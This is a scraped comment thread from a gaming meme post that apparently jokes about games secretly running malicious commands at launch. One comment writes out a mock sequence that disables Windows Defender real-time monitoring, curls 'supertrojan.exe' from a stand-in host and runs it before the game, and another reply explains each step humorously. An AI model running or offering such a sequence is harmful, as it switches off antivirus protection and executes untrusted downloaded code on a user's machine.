The Picard Maneuver to GamingEnglish • 8 months agoIgnorance is blissimagemessage-square45arrow-up1588arrow-down115
arrow-up1573arrow-down1imageIgnorance is blissThe Picard Maneuver to GamingEnglish • 8 months agomessage-square45
minus-squareNorgurlinkfedilink123•edit-28 months agoSet-MpPreference -DisableRealtimeMonitoring $true curl https://malwarefo.ru/supertrojan.exe ./supertrojan.exe ./game.exe exit 0
minus-squareDr. CoomerlinkEnglish0•8 months agoIs there a way to remove it or stop it from happening?
minus-square@CosmicTurtlelinkEnglish91•8 months ago Set-MpPreference -DisableRealtimeMonitoring $true Disables malware scanning in windows (I assume) curl https://malwarefo.ru/supertrojan.exe Downloads supertrojan.exe from a Russian website ./supertrojan.exe Executes the file ./game.exe Runs the game exit Closes the command prompt. 0 Opens the portal to the underworld, to ensure that the command prompt closes correctly.
minus-square@[email protected]linkfedilinkEnglish44•edit-28 months agoNot saying you should understand it, but it does answer it if you understand it
Set-MpPreference -DisableRealtimeMonitoring $true curl https://malwarefo.ru/supertrojan.exe ./supertrojan.exe ./game.exe exit 0
But I don’t want a super Trojan : -(
Is there a way to remove it or stop it from happening?
Yes
This answers nothing
Disables malware scanning in windows (I assume)
Downloads
supertrojan.exe
from a Russian websiteExecutes the file
Runs the game
Closes the command prompt.
Opens the portal to the underworld, to ensure that the command prompt closes correctly.
Not saying you should understand it, but it does answer it if you understand it